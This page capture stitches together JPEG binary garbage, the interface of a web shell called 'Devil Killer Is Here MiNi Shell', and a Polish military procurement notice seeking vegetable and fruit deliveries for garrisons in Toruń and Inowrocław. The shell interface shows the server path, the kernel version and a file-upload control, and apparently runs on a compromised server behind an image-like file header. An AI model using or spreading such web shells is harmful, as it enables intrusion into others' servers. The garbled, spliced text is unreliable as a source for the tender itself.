JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201020/599867-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 599867-N-2020 z dnia 2020-10-20 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">12 Wojskowy Oddział Gospodarczy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa warzyw i owoców</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">12 Wojskowy Oddział Gospodarczy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">34090172500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Okólna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">37</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">87-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Toruń</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">261 43 35 40, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">12wog@ron.mil.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">261 43 36 60</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://12wog.wp.mil.pl/pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">https://12wog.wp.mil.pl/pl/</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">https://platformazakupowa.pl/pn/12wog</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://platformazakupowa.pl/pn/12wog</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://platformazakupowa.pl/pn/12wog</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Tak</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne">https://platformazakupowa.pl/pn/12wog</span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Papierowo</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">12. Wojskowy Oddział Gospodarczy, ul. Okólna 37, 87-100 Toruń, Kancelaria Jawna, bud. 97, pom. 12 </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa warzyw i owoców</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">P/41/IW/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Na wszystkie części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest: Dostawa warzyw i owoców w asortymencie i ilościach podanych w ust. 7.2.	Szczegółowe wymogi odnośnie przedmiotu zamówienia zawarto w niniejszym SIWZ i w załącznikach:2.1. Nr od 1.1. do 1.55. Opis przedmiotu zamówienia;2.2.	Nr 5 Projekt umowy.3.	Przedmiot zamówienia został podzielony na cztery części:3.1.	Część 1 – Dostawa warzyw i ziemniaków dla Garnizonu Toruń;3.2.	Część 2 – Dostawa owoców dla Garnizonu Toruń;3.3.	Część 3 – Dostawa warzyw i ziemniaków dla Garnizonu Inowrocław;3.4.	Część 4 – Dostawa owoców dla Garnizonu Inowrocław.4.	Wykonawca może złożyć jedną ofertę na wszystkie lub na wybrane części.5.	Zamawiający zastrzega sobie prawo do weryfikacji zgodności norm jakościowych dostarczanych produktów z jakością ustaloną w niniejszym SIWZ i w oparciu o:5.1.	PN-R-74456 Rośliny okopowe - Badanie jakości ziemniaków;5.2.	PN-R-75356 Warzywa świeże – Badanie jakości;5.3.	PN-R-75021 Owoce świeże - Badanie jakości.6.	Prawo do weryfikacji zgodności norm, o którym mowa w ust. 5 przysługuje (tj. pobrania prób i badania dostarczonego towaru) w imieniu Zamawiającego przysługuje właściwemu miejscowo dla Zamawiającego lub Odbiorcy akredytowanemu laboratorium lub laboratorium spełniającemu wymagania normy PN-EN ISO/IEC 17025.7.	Szczegółowy zakres dostaw owoców i warzyw dla poszczególnych częściach zamówienia:7.1.	Część 1 – Dostawa warzyw i ziemniaków dla Garnizonu Toruń:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Ziemniaki wczesne	kg	1 000	500	5002.	Buraki ćwikłowe	kg	4 600	2 300	2 3003.	Marchew	kg	9 800	5 400	4 400a	b	c	d	e	f4.	Pietruszka korzeniowa	kg	2 900	1 450	1 4505.	Seler korzeniowy	kg	4 800	2 400	2 4006.	Cebula	kg	6 800	3 400	3 4007.	Cebula czerwona	kg	300	150	1508.	Por	kg	3 900	1 950	1 9509.	Kapusta biała	kg	5 500	2 750	2 75010.	Kapusta czerwona	kg	2 500	1 250	1 25011.	Czarna rzepa	kg	500	250	25012.	Fasola szparagowa	kg	400	200	20013.	Papryka słodka	kg	2 200	1 250	95014.	Pomidory	kg	3 600	2 050	1 55015.	Pomidorki cherry	kg	140	70	7016.	Ogórki	kg	4 000	2 000	2 00017.	Sałata kg	740	370	37018.	Sałata lodowa	kg	850	425	42519.	Sałata karbowana	kg	60	30	3020.	Roszponka	kg	30	15	1521.	Cykoria	kg	60	30	3022.	Rukola	kg	70	35	3523.	Brokuły	kg	600	300	30024.	Kapusta włoska	kg	400	200	20025.	Kapusta pekińska	kg	1 900	950	95026.	Kapusta brukselska	kg	580	290	29027.	Kalafior	kg	1 400	700	70028.	Rzodkiewka	kg	780	390	39029.	Rabarbar	kg	200	100	10030.	Natka pietruszki	kg	320	160	160a	b	c	d	e	f31.	Koperek zielony	kg	400	200	20032.	Szczypiorek	kg	280	140	14033.	Botwina	kg	260	130	13034.	Kiełki rzodkiewki	kg	8	4	435.	Kiełki słonecznika	kg	8	4	436.	Czosnek	kg	180	90	9037.	Pieczarki kg	1400	700	70038.	Cukinia	kg	200	100	10039.	Bakłażan	kg	70	35	3540.	Szparagi	kg	70	35	357.2. Część 2 – Dostawa owoców dla Garnizonu Toruń:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Banany	kg	4 300	2 400	19002.	Cytryny	kg	1 600	800	8003.	Pomarańcze	kg	3 300	1 650	16504.	Mandarynki	kg	2 100	1 050	10505.	Grejpfruty	kg	600	300	3006.	Arbuz	kg	160	80	807.	Kiwi	kg	1 300	650	6508.	Morele	kg	740	370	3709.	Brzoskwinie	kg	900	450	45010.	Winogrona	kg	300	150	15011.	Jabłka	kg	11 600	5 800	5 800a	b	c	d	e	f12.	Gruszki	kg	3 800	2 150	1 65013.	Mango	kg	110	55	5514.	Ananas	kg	70	35	3515.	Nektarynki	kg	1 600	800	8007.3.	Część 3 – Dostawa warzyw i ziemniaków dla Garnizonu Inowrocław:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Ziemniaki wczesne	kg	400	200	2002.	Buraki ćwikłowe	kg	2 000	1 000	1 0003.	Marchew	kg	3 500	2 000	1 5004.	Pietruszka korzeniowa	kg	1 000	500	5005.	Seler korzeniowy	kg	2 000	1 000	1 0006.	Cebula	kg	3 000	1 500	1 5007.	Cebula czerwona	kg	200	100	1008.	Por	kg	1 000	600	4009.	Kapusta biała	kg	3 000	1 500	1 50010.	Kapusta czerwona	kg	1 000	500	50011.	Czarna rzepa	kg	200	100	10012.	Fasola szparagowa	kg	300	150	15013.	Papryka słodka	kg	1 000	500	50014.	Pomidory	kg	1 500	750	75015.	Pomidorki cherry	kg	300	150	15016.	Ogórki	kg	1 700	1 000	70017.	Sałata kg	400	200	20018.	Sałata lodowa	kg	400	200	20019.	Sałata karbowana	kg	20	10	10a	b	c	d	e	f20.	Roszponka	kg	40	20	2021.	Cykoria	kg	20	10	1022.	Rukola	kg	40	20	2023.	Brokuły	kg	600	300	30024.	Kapusta włoska	kg	200	100	10025.	Kapusta pekińska	kg	1 000	500	50026.	Kapusta brukselska	kg	500	250	25027.	Kalafior	kg	600	300	30028.	Rzodkiewka	kg	100	50	5029.	Rabarbar	kg	200	100	10030.	Natka pietruszki	kg	200	100	10031.	Koperek zielony	kg	200	100	10032.	Szczypiorek	kg	100	50	5033.	Botwina	kg	60	30	3034.	Kiełki rzodkiewki	kg	4	2	235.	Kiełki słonecznika	kg	4	2	236.	Czosnek	kg	100	50	5037.	Pieczarki kg	1200	600	60038.	Cukinia	kg	100	50	5039.	Bakłażan	kg	10	5	540.	Szparagi	kg	50	25	25 7.4.	Część 4 – Dostawa owoców dla Garnizonu Inowrocław l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowy1.	Banany	kg	800	500	3002.	Cytryny	kg	650	400	2503.	Pomarańcze	kg	800	400	4004.	Mandarynki	kg	600	300	3005.	Grejpfruty	kg	500	250	2506.	Kiwi	kg	500	250	2507.	Morele	kg	100	50	508.	Brzoskwinie	kg	300	150	1509.	Winogrona	kg	40	20	2010.	Jabłka	kg	7000	3 500	350011.	Gruszki	kg	600	300	30012.	Nektarynki	kg	300	150	150	8.	Przedmiot zamówienia winien być zgodny z przywoływanymi poniżej przepisami:8.1.	Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz.U. 2019 r. poz. 1252 z późn. zm.);8.2.	Rozporządzeniem Wykonawczym Komisji (UE) Nr 543/2011 z dnia 7 czerwca 2011 r. ustanawiające szczegółowe zasady stosowania rozporządzenia Rady (WE) nr 1234/2007 w odniesieniu do sektora owoców i warzyw oraz sektora przetworzonych owoców i warzyw (Dz.U. UE. L. 2011.157.1 z późn zm.);8.3.	Rozporządzenie Komisji (WE) Nr 1881/2006 z dnia 19 grudnia 2006 r. ustalające najwyższe dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych (Dz.U. UE. L.2006.364.5 z późn. zm.);8.4.	Rozporządzenie (WE) Nr 396/2005 Parlamentu Europejskiego i Rady z dnia 23 lutego 2005 r. w sprawie najwyższych dopuszczalnych poziomów pozostałości pestycydów w żywności i paszy pochodzenia roślinnego i zwierzęcego oraz na ich powierzchni, zmieniające dyrektywę Rady 91/414/EWG (Dz.U.UE.L.2005.70.1 z późn. zm.);8.5.	Ustawa z dnia 7 maja 2009 r. o towarach paczkowanych (tj. Dz.U.2020 r. poz.1442 z pożn zm.);8.6.	Rozporządzenie Parlamentu Europejskiego i Rady (WE) NR 1333/2008 z dnia 16 grudnia 2008 r. w sprawie dodatków do żywności (Dz.U.UE.L.2008.354.16);8.7.	Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 23 grudnia 2014 r. w sprawie znakowania poszczególnych środków spożywczych ( Dz. U. z 2015 r., poz. 29 z późn. zm.);9.	Wykonawca zobowiązany jest dostarczyć poszczególne produkty określone w ust. 8 sukcesywnie (według bieżących potrzeb), w poniedziałki i czwartki w godzinach od 7.00 do 12.00 ubezpieczonym i specjalistycznym transportem na koszt Wykonawcy, na podstawie zamówień składanych telefonicznie lub faksem do Wykonawcy z wyprzedzeniem co najmniej dwóch dni przed dostawą do magazynów Odbiorców znajdujących w:10.1	Toruniu: ul. Okólna 37 i ul. Sobieskiego 36 oraz miejsce wskazane przez Zamawiającego w odległości do 50 km od granic administracyjnych miasta Torunia – część Nr 1 i 2;10.2	Inowrocławiu: ul. Jacewska 73 i ul. Dworcowa 56 oraz miejsce wskazane przez Zamawiającego w odległości do 50 km od granic administracyjnych miasta Inowrocławia – część Nr 2 i 3.10.	Zamawiający, zgodnie z zapisem art. 34 ust. 5 Ustawy Pzp, przewiduje możliwość zastosowania prawa opcji na poniższych zasadach:10.1.	jeżeli w trakcie realizacji zamówienia okaże się, iż Zamawiający posiada środki finansowe oraz potrzebę zamówienia większej ilości towaru w stosunku do przewidywanego zakresu podstawowego (obligatoryjnego.-.minimalnego),10.2. Zamawiający pozostawia sobie możliwość skorzystania z prawa opcji i zamówienia dodatkowego asortymentu określonego w ust. 7 niniejszego rozdziału, w ramach zawartej umowy, za które Wykonawcy będzie przysługiwało odrębne wynagrodzenie wyliczone na podstawie cen jednostkowych ujętych w ofercie Wykonawcy, z którym zamawiający podpisze umowę;10.3.	Zamawiający zastrzega, iż część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie;10.4.	brak realizacji zamówienia w zakresie prawa opcji nie będzie rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego; Zamówienie, wynikające z prawa opcji nie przekroczy ilości wskazanych w ust. 7 (zakres dostaw dodatkowy) niniejszego Rozdziału SIWZ.11.	Zamawiający określił w Formularzu ofertowym (Załącznik Nr 2.) zakres podstawowy dostaw i zakres dodatkowy przy wykorzystaniu tzw prawa opcji, jednak wartość zamówienia (wartość brutto oferty) w formularzu odnosi się do ilości jakie Wykonawca ma dostarczyć Zamawiającemu w ramach niniejszego postępowania bez zastosowania prawa opcji – czyli do zakresu podstawowego dostaw.12.	Zamawiający, za dostarczenie przedmiotu zamówienia, przewiduję płatności częściowe – jednak nie częściej niż raz w miesiącu.13.	Wspólny Słownik Zamówienia CPV: 15300000-1	(Owoce, warzywa i podobne produkty); 03221000-6 (Warzywa); 03222000-3 (Owoce i orzechy); 03222110-7 (Owoce tropikalne); 03222200-5 (Owoce cytrusowe).14.	Zamawiający nie przewiduje:14.1.	Udzielania zamówień, o których mowa w art. 67 ust. 1 pkt. 7 ustawy PZP (art. 36 ust. 2pkt. 3 Ustawy Pzp);14.2.	Zawarcia umowy ramowej (art. 36 ust. 2 pkt. 2 Ustawy Pzp);14.3.	Rozliczenia w walutach obcych (art. 36 ust. 2 pkt. 6 Ustawy Pzp);14.4.	Aukcji elektronicznej (art. 36 ust. 2 pkt. 7 Ustawy Pzp);14.5.	Zwrotu kosztów udziału w postępowaniu (art. 36 ust. 2 pkt. 8 Ustawy Pzp);14.6.	zastosowania wymagań, o których mowa w art. 29 ust. 4 Ustawy Pzp.15.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. (art. 36 ust. 2 pkt. 10 Ustawy Pzp).16.	Cechy produktu wynikające z art. 30 ust. 9 pkt. 2)b)i d) Ustawy 